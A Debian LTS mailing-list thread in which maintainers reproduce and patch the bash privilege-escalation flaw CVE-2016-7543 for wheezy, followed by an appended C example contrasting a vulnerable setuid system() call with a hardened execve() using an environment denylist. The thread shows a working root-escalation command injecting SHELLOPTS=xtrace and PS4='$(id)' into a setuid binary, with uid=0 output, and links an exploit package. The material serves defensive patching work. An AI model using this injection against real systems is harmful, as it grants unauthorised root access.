
Re: Wheezy update of bash?



Hi all

I have now prepared a correction of this problem for wheezy. One of the reasons why it took me a little more time than usual was the fact that the upstream correction turned out to be incomplete. I have reported that problem in bug #841856 today.
I have added that to the security tracker too. The correction for 841856 may be a little too simple for upstream, but for wheezy it should be good enough.

Anyway, I have been able to correct that and intend to upload the correction in four days if no one complains.

You can find the debdiff here:
http://apt.inguza.net/wheezy-security/bash/bash.debdiff

And the packages that I intend to upload here:
http://apt.inguza.net/wheezy-security/bash/

The source code I used to test the exploit is available here:
http://apt.inguza.net/wheezy-security/bash/exploit.tar.gz

The exploit usage is:
make
sudo make root
make test

If you see a user identity other than your own in the output you have successfully gained more permission than you should.

Best regards

// Ola


On 7 October 2016 at 23:18, Ola Lundqvist <ola@inguza.com> wrote:
Hi Balint

It was the default shell that made the difference. Thanks again for this suggestion. I can reproduce the problem now. Very good.

An interesting note is that it is only possible to escalate the privilege to root. If I change the owner of the file to www-data (and the setuid to 33) the id command is not executed as www-data.

This means that the bash fix to only make a special case for root is good. I thought maybe the fix was incomplete.

I'll look into the fixing part now. I have found the patch and it looks trivial. As I can reproduce it easily now (with changed default shell to bash) it should be trivial to verify whether the correction was good or not.

Best regards

// Ola

On 7 October 2016 at 09:26, Bálint Réczey <balint@balintreczey.hu> wrote:
Hi,

2016-10-07 8:10 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
> Hi Balint
>
> Ah, it could be the default shell. I'll try that. Thanks for the suggestion.
>
> Merely that the command id is executed is not a reproduction. It has to be
> executed as another user than the one executing the binary to be a
> security problem. If not it could be a bug but not a security bug (privilege
> escalation).

True, but it works on setuid binaries, too:

root@debian-wheezy:/home/vagrant# ls -alh /bin/sh
lrwxrwxrwx 1 root root 4 Oct  7 07:16 /bin/sh -> bash
root@debian-wheezy:/home/vagrant# gcc -xc - -otest <<< 'int main() {
setuid(0); system("/bin/date"); }'
root@debian-wheezy:/home/vagrant# chmod 4755 ./test
root@debian-wheezy:/home/vagrant# ls -l ./test
-rwsr-xr-x 1 root root 6877 Oct  7 07:19 ./test
root@debian-wheezy:/home/vagrant# exit
exit
vagrant@debian-wheezy:~$  env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root) gid=1000(vagrant)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(vid/bin/date
Fri Oct  7 07:19:34 GMT 2016
vagrant@debian-wheezy:~$

Cheers,
Balint


>
> Best regards,
>
> // Ola
>
> On 7 October 2016 at 00:12, Bálint Réczey <balint@balintreczey.hu> wrote:
>>
>> Hi Ola,
>>
>> 2016-10-06 23:08 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
>> > Hi Matthias and Balint
>> >
>> > I have tried to reproduce the problem described in the openwall email.
>> > However I can not reproduce it. Have you been able to?
>> >
>> > On wheezy:
>> > ------------
>> > ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
>> > Thu Oct  6 20:54:07 UTC 2016
>> > ola@tigereye:/$ ls -la test
>> > -rwsr-xr-x 1 root root 6824 Oct  6 20:52 test
>> > ola@tigereye:/$ dpkg -l bash
>> > ...CUT...
>> > ii  bash           4.2+dfsg-0.1 amd64        GNU Bourne Again SHell
>> >
>> > On jessie:
>> > ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
>> > Thu Oct  6 22:48:35 CEST 2016
>>
>> When I set the default shell to bash it worked for me.
>> Please try with sudo dpkg-reconfigure dash.
>>
>> > ola@tigereye:~/exploit$ dpkg -l bash
>> > ...CUT...
>> > ii  bash           4.3-11+b1    amd64        GNU Bourne Again SHell
>> >
>> > I think it may be because SHELLOPTS is a read-only variable.
>> >
>> > ola@tigereye:~/exploit$ SHELLOPTS=xtrace
>> > bash: SHELLOPTS: readonly variable
>> >
>> > Do you think I have made a mistake in the reproduction, or is it so that
>> > the patch was actually not for a real problem (at least in Debian)?
>> >
>> > Not even if I change the code like this:
>> > ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0);
>> > system("/bin/bash -c /bin/date"); }'
>> > ola@tigereye:~/exploit$ ./test2
>> > Thu Oct  6 23:04:11 CEST 2016
>> > ola@tigereye:~/exploit$ set -x
>> > ola@tigereye:~/exploit$ ./test2
>> > uid=1000(ola) gid=1000(ola)
>> >
>> > groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
>> > Thu Oct  6 23:04:18 CEST 2016
>>
>> This runs the command passed in PS4 thus I consider this a reproduction.
>>
>> Cheers,
>> Balint
>>
>> >
>> > My conclusion is that there is no security hole. But I may be mistaken.
>> >
>> > Can anyone else reproduce the issue?
>> >
>> > Best regards,
>> >
>> > // Ola
>> >
>> > On 6 October 2016 at 12:29, Ola Lundqvist <ola@inguza.com> wrote:
>> >>
>> >> Hi Matthias
>> >>
>> >> I will look into this.
>> >>
>> >> // Ola
>> >>
>> >> On 6 October 2016 at 01:06, Matthias Klose <doko@debian.org> wrote:
>> >>>
>> >>> On 05.10.2016 16:02, Balint Reczey wrote:
>> >>> > Hello dear maintainer(s),
>> >>> >
>> >>> > the Debian LTS team would like to fix the security issues which are
>> >>> > currently open in the Wheezy version of bash:
>> >>> > https://security-tracker.debian.org/tracker/CVE-2016-7543
>> >>> >
>> >>> > Would you like to take care of this yourself?
>> >>>
>> >>> please go ahead.
>> >>>
>> >>> Matthias
>> >>>
>> >>
>> >>
>> >>
>> >> --
>> >>  --- Inguza Technology AB --- MSc in Information Technology ----
>> >> /  ola@inguza.com                    Folkebogatan 26            \
>> >> |  opal@debian.org                   654 68 KARLSTAD            |
>> >> |  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
>> >> \  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
>> >>  ---------------------------------------------------------------
>> >>
>> >
>> >
>> >
>> >
>
>
>
>
>
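The reproduction Bálint posted above shows the shape of the bug on the calling side as well as on bash's side: the setuid test binary calls system(), which runs "/bin/sh -c" with the unprivileged caller's environment intact, so a /bin/sh that resolves to bash imports SHELLOPTS=xtrace and PS4='$(id)' and runs the command substitution with euid 0. The following is an added example, not code from this thread, from the Debian packages or from bash itself; it puts the vulnerable call next to a hardened form that a setuid helper should use regardless of whether the shell is fixed: no shell at all, an explicit argv, and an environment filtered through a denylist before execve(). The variable list in the denylist is my own assumption of what a privileged program should never pass to a shell, not an exhaustive list.

```c
/* Added example: vulnerable setuid helper shape from the thread next to a
 * hardened variant. Not code from the thread, Debian or bash. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Assumed denylist: variables that must never cross a privilege boundary
 * into a shell. SHELLOPTS and PS4 are the pair used in the thread; the
 * rest are other well-known shell and loader controls. Not exhaustive. */
static const char *const denylist[] = {
    "SHELLOPTS", "BASHOPTS", "PS4", "BASH_ENV", "ENV", "IFS",
    "LD_PRELOAD", "LD_LIBRARY_PATH", "CDPATH", "GLOBIGNORE", NULL
};

/* Returns 1 if the NAME part of a "NAME=value" entry is on the denylist. */
int env_is_dangerous(const char *entry)
{
    size_t n = strcspn(entry, "=");
    for (int i = 0; denylist[i]; i++)
        if (strlen(denylist[i]) == n && strncmp(denylist[i], entry, n) == 0)
            return 1;
    return 0;
}

/* Build a NULL-terminated copy of src with dangerous entries dropped.
 * Entry strings are shared, only the array is allocated; caller frees it.
 * On success *out_count receives the number of entries kept. */
char **env_sanitize(char *const *src, size_t *out_count)
{
    size_t n = 0;
    for (char *const *p = src; *p; p++)
        n++;
    char **dst = calloc(n + 1, sizeof *dst);
    if (!dst)
        return NULL;
    size_t k = 0;
    for (char *const *p = src; *p; p++)
        if (!env_is_dangerous(*p))
            dst[k++] = *p;
    dst[k] = NULL;
    if (out_count)
        *out_count = k;
    return dst;
}

/* Vulnerable shape from the thread: system() runs "/bin/sh -c /bin/date"
 * with the caller's environment. If /bin/sh is bash without the fix,
 * SHELLOPTS=xtrace PS4='$(id)' makes bash run id as the effective user. */
int run_date_vulnerable(void)
{
    return system("/bin/date");
}

/* Hardened: fork + execve with an explicit argv and a sanitized
 * environment, so no shell is involved and no tracing knobs arrive. */
int run_date_hardened(char *const *caller_env)
{
    char **env = env_sanitize(caller_env, NULL);
    if (!env)
        return -1;
    pid_t pid = fork();
    if (pid < 0) {
        free(env);
        return -1;
    }
    if (pid == 0) {
        char *const argv[] = { "/bin/date", NULL };
        execve("/bin/date", argv, env);
        _exit(127);
    }
    free(env);
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed caller environment mirroring the thread's reproduction. */
    char *env[] = { "SHELLOPTS=xtrace", "PS4=$(id)", "PATH=/usr/bin:/bin", NULL };
    size_t kept = 0;
    char **clean = env_sanitize(env, &kept);
    if (!clean)
        return 1;
    printf("kept %zu of 3 variables after sanitizing\n", kept);
    free(clean);
    return run_date_hardened(env) == 0 ? 0 : 1;
}
```

The denylist approach is deliberately the weaker of the two options shown: execve() with a fully constructed environment (only PATH and whatever the target genuinely needs) is the safer default for anything that runs with elevated privileges, and the bash-side fix in the thread is defence in depth, not a replacement for it.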






